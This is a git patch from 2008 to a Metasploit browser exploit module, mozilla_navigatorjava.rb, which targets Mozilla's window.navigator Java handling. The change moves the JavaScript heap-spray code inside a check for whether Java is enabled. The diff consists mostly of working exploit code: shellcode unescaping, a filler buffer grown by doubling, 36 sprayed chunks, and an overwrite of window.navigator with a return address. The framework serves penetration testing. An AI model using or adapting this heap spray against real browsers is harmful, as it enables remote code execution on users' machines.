From a0a203fba7dd0ba28543b720c2ece9046b5985f4 Mon Sep 17 00:00:00 2001
From: James Lee <James_Lee@rapid7.com>
Date: Sat, 19 Jul 2008 05:03:01 +0000
Subject: [PATCH] don't hang the browser building the exploit buffer if we
 can't exploit it

git-svn-id: file:///home/svn/framework3/trunk@5558 4d416f70-5f16-0410-b530-b9f4589650da
---
 .../multi/browser/mozilla_navigatorjava.rb    | 30 +++++++++----------
 1 file changed, 14 insertions(+), 16 deletions(-)

diff --git a/modules/exploits/multi/browser/mozilla_navigatorjava.rb b/modules/exploits/multi/browser/mozilla_navigatorjava.rb
index b95a70e205..353872a57a 100644
--- a/modules/exploits/multi/browser/mozilla_navigatorjava.rb
+++ b/modules/exploits/multi/browser/mozilla_navigatorjava.rb
@@ -90,7 +90,7 @@ class Exploits::Multi::Browser::Mozilla_NavigatorJava < Msf::Exploit::Remote
 		# Re-generate the payload
 		return if ((p = regenerate_payload(cli)) == nil)
 
-		print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")
+		print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
 		send_response_html(cli, generate_html(p), { 'Content-Type' => 'text/html' })
 		
 		# Handle the payload
@@ -105,22 +105,20 @@ class Exploits::Multi::Browser::Mozilla_NavigatorJava < Msf::Exploit::Remote
 <html><head>
 <script>
 	function Exploit() {
-	
-		var shellcode = unescape("#{enc_code}");
-		var b = unescape("#{target['Fill']}");
-		while (b.length <= 0x400000) b+=b;
-
-		var c = new Array();
-		for (var i =0; i<36; i++) {
-			c[i] = 
-				b.substring(0,  0x100000 - shellcode.length) + shellcode +
-				b.substring(0,  0x100000 - shellcode.length) + shellcode + 
-				b.substring(0,  0x100000 - shellcode.length) + shellcode + 
-				b.substring(0,  0x100000 - shellcode.length) + shellcode;
-		}
-
-
 		if (window.navigator.javaEnabled) {
+			var shellcode = unescape("#{enc_code}");
+			var b = unescape("#{target['Fill']}");
+			while (b.length <= 0x400000) b+=b;
+
+			var c = new Array();
+			for (var i =0; i<36; i++) {
+				c[i] = 
+					b.substring(0,  0x100000 - shellcode.length) + shellcode +
+					b.substring(0,  0x100000 - shellcode.length) + shellcode + 
+					b.substring(0,  0x100000 - shellcode.length) + shellcode + 
+					b.substring(0,  0x100000 - shellcode.length) + shellcode;
+			}
+
 			window.navigator = (#{target['Ret']} / 2);
 			try {
 				java.lang.reflect.Runtime.newInstance(